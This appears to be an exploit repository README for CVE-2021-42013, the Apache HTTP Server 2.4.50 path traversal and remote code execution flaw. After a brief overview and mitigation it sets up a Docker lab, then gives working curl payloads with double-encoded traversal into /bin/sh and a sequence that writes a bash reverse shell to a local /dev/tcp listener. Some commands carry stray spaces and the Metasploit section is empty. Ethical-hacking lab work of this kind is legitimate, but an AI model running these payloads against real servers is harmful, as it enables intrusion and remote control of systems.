## https://sploitus.com/exploit?id=C5A61CC6-919E-58B4-8FBB-0198654A7FC8
# CVE-2021-42013: Apache HTTP Server Path Traversal and Remote Code Execution Vulnerability
## Overview
This repository provides information and resources related to CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (versions 2.4.50). The vulnerability allows for path traversal and remote code execution (RCE) through a crafted URL path, enabling attackers to access and execute files outside the server's document root.
Details
- CVE Identifier: CVE-2021-42013
- Severity: Critical
- Affected Versions: Apache HTTP Server 2.4.50
- Fixed Version: Apache HTTP Server 2.4.51 or later
Description
CVE-2021-42013 is a vulnerability resulting from an incomplete fix for CVE-2021-41773. This flaw permits attackers to perform path traversal and potentially execute arbitrary code on the server. Exploitation of this vulnerability can lead to significant security breaches, including unauthorized access to sensitive data and full system compromise.
## Impact
Successful exploitation of CVE-2021-42013 can result in:
1. Unauthorized File Access: Attackers can access files outside the server’s document root, including sensitive system files, configuration files, and other protected resources. This could lead to the exposure of critical information, such as credentials, internal configurations, and other sensitive data.
2. Remote Code Execution: By accessing and executing arbitrary files, attackers can potentially run malicious scripts or binaries on the server. This could allow them to take control of the server, install malware, create backdoors, and manipulate server operations.
3. Service Disruption: Unauthorized access and execution of commands can disrupt normal server operations, leading to downtime, performance degradation, and denial of service (DoS) conditions. This impacts the availability and reliability of the services hosted on the server.
4. Privilege Escalation: In cases where the server runs with elevated privileges, an attacker exploiting this vulnerability could gain administrative access, allowing them to perform further malicious activities and escalate their control over the server environment.
5. Data Integrity Compromise: Attackers could modify or delete critical files, compromising the integrity of the data hosted on the server. This includes altering website content, defacing web pages, or tampering with application data.
## Mitigation
To protect your server from CVE-2021-42013, it is crucial to:
1. Update Apache HTTP Server: Upgrade to version 2.4.51 or later, where this vulnerability has been addressed.
2. Restrict Access: Ensure proper server configuration to restrict access to only necessary files and directories, reducing the risk of path traversal attacks.
## Simulation
Now, how about we do the simulation shall we? Before we start, you need to have docker engine. The installation is pretty simple, just make sure you have docker engine ready in your computer. I will help you provide the link [here](https://docs.docker.com/engine/install/). We use docker for the lab to make sure our simulation for the exploitation of the vulnerability is in line with the ethical hacking. Now enough yapping, let's start it!
### Usage
1. Clone this repository
Use git command to clone the repository
```
git clone https://github.com/rafifdna/CVE-2021-42013.git
```
Go to the directory of the file
```
cd CVE-2021-42013
```
2. Prepare Lab
First, build the images of the Dockerfile with the command below :
```
docker build -t apache-lab
```
Then, after the images is build, run the docker images with the command below :
```
docker run -dit -p 888:80 apache-lab
```
3. Verify Lab (Optional)
You can also check the docker to make sure the lab is running.
```
docker ps
```
```
docker logs <container-id>
```
Make sure the web is running, you can try curl the web to see the output.
```
curl http://172.17.0.2:888
```
4. Execution
Install the library requirement
```
pip install -r requirements.txt
```
You can use the script of exploit.py to perform vulnerability checking whether the website you targeted is vulnerable to the exploit or not before continue to the execution. This script include Path Traversal and Remote Code Execution (RCE).
```
python3 exploit.py -u http://172.17.0.2
```
Next, try using curl if we can
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; uname -a'
```
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; ls'
```
## Exploitation
1. Remote Code Execution
Using Reverse Shell With Netcat
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; echo "#!/bin/bash" > /t
mp/lab.sh'
```
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; echo "bash -i >& /dev/t
cp/127.0.0.1/221 0>&1" >> /tmp/lab.sh'
```
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; cat /tmp/lab.sh'
```
Using Metasploit
### References
[CVE-2021-42013 Details](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)